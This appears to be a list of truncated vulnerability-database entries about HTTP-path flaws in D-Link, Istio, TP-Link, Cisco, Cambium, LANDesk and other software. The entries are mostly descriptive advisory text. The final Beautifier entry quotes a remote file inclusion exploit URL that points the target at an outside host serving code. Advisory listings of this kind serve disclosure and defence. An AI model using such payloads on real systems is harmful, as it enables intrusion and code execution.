CVE-2021-29296

Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vctwan; the sbin/httpd would invoke the strchr function and take NULL as a first argument,...

istio: unauthorised access to JWT protected HTTP path

An unauthorized access vulnerability was found in Istio in the servicemesh-proxy. An attacker can use this flaw to specify an HTTP path and gain unauthorized access, even if the path is configured to only be accessed with a valid JSON Web Token JWT...

CVE-2020-8595

An unauthorized access vulnerability was found in Istio in the servicemesh-proxy. An attacker can use this flaw to specify an HTTP path and gain unauthorized access, even if the path is configured to only be accessed with a valid JSON Web Token JWT. Mitigation Depending on the paths used in the...

Anker Roav A1 Dashcam HTTP Path Overflow Code Execution Vulnerability

Summary An exploitable code execution vulnerability exists in the URL-parsing functionality of the Roav A1 Dashcam running version “RoavA1SWV1.9.” A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this...

TP-Link TL-R600VPN HTTP Path Traversal Vulnerability

The TP-Link TL-R600VPN is an enterprise router from China P&L TP-LINK. A path traversal vulnerability exists in the HTTP server feature in TP-Link TL-R600VPN HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3 versions. An attacker can exploit the vulnerability to disclose sensitive system files with the help of a...

CVE-2018-6547

playsservice.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, contains an HTTP message parsing function that takes a user-defined path and writes non-user controlled data as SYSTEM to the file when the extractfiles...

Path traversal

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https:///adm/syscmd.asp...

CVE-2017-5259

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https:///adm/syscmd.asp...

CVE-2016-6370

Directory traversal vulnerability in the web interface in Cisco Hosted Collaboration Mediation Fulfillment HCM-F 10.63 and earlier allows remote authenticated users to read arbitrary files via a crafted pathname in an HTTP request, aka Bug ID CSCuz27255...

LANDesk Management Suite Remote File Inclusion (CVE-2014-5362)

A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in the HTTP path. A remote attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a malicious parameter...

FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure

No description provided by source. source: http://www.securityfocus.com/bid/1141/info htimage.exe can be used to determine if a specified path and filename exists on the target host or not. The specified path must be on the same logical drive as the web content. Any file can be specified as an...

Beautifier 0.1 (Core.php) Remote File Include Vulnerability

No description provided by source. Beautifier v0.1 Remote File Inclusion Vulnerability Download: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz Found By: the master exploit: http://Target/Path/Beautifier/Core.php?BEAUTPATH=http://cmd.gif? milw0rm.com 2006-09-06...